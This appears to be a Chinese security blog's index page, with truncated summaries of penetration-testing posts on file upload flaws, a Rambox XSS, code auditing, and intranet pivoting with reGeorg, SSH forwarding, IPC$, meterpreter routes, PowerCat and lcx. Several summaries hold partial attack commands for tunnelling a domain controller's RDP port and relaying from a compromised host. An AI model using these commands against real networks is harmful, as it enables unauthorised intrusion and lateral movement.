摘要:
文件上传漏洞 漏洞简介 文件上传,顾名思义就是上传文件的功能行为,之所以会被发展为危害严重的漏洞,是程序没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。文件上传漏洞是漏洞中最为简单猖獗的利用形式,一般只要能上传获取地址,可执行文件被解析就可以获取系统WebSh 阅读全文
摘要:
漏洞详情 当前说明 Rambox 0.6.9中存储了XSS,可能导致代码执行。添加/编辑服务时,XSS位于名称字段中。发生此问题是由于在处理和存储名称字段时不正确的清理。这允许用户为Node.js和Electron制作有效负载,例如在IMG元素的onerror属性内的OS命令执行程序。 分析说明 R 阅读全文
摘要:
通用代码审计思路 1)根据敏感关键字回溯参数传递过程。 我们挑其中的一条代码,双击该项直接定位到这行代码,在选中该变量后,在下方可以看到该变量的传递过程,并且点击下方的变量传递过程也可以直接跳转到该项代码处,可以非常直观地帮助我们看清整个变量在该文件的传递过程。另外我们可以看到$parentid变量 阅读全文
摘要:
HTTP和HTTPSreGeorg将脚本文件上传到目标服务器中,使用kali访问上传到服务器的tunnel文件。然后利用reGeorgSocksProxy.py脚本监听本地的9999端口,就可以成功建立一个通信链路。 python reGeorgSocksProxy.py -u http://1.1 阅读全文
摘要:
本地转发环境情况:web服务器ip:192.168.2.160vps:192.168.2.181域控:1.1.1.2以web服务器为跳板,将域控服务器的3389映射到vps的1153端口,再访问vps的1153,就可以访问域控的3389了。在vps执行如下命令:ssh -CfNg -L 1153:1 阅读全文
摘要:
IPC 建立IPC net use \\1.1.1.2\ipc$ "密码" /user:administratornet use 可以查看状态 IPC的利用条件 使用windows自带工具获取远程主机信息 dir命令 tasklist 命令 计划任务 at命令主要工作在winserver2008之前 阅读全文
摘要:
当我们在渗透中已经拿到shell和meterpreter,我们想要继续渗透内网,需要先获取目标内网的相关信息, run get_local_subnets 可以看到该主机处于什么网段。 如果我们不添加探测出的网段路由的话,是探测不到这网段其他主机的。 以下是手动添加到达192.168.11.0和19 阅读全文
摘要:
一般的渗透流程: 信息搜集 资产信息搜集 旁站 子域名 公网ip等 个人信息收集个人邮箱 外网突破 获取公网目标权限Webshell服务器系统权限 目标环境内PC机权限员工个人PC机 内网突破 确定内网拓扑结构 探测其他主机开放服务 寻找内网其他资产 确定靶标位置 横向移动 OWASP TOP10 阅读全文
摘要:
PowerCat可以说是nc的PowerShell版本。可以通过执行命令回到本地运行,亦可以使用远程权限运行。 下载地址:https://github.com/besimorhino/powercat切换到该目录,输入:Import-Module ./powercat.ps1发现报错。输入 "Set 阅读全文
摘要:
lcx用法: lcx的Linux版本为portmap、 1.内网端口转发 本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.5 阅读全文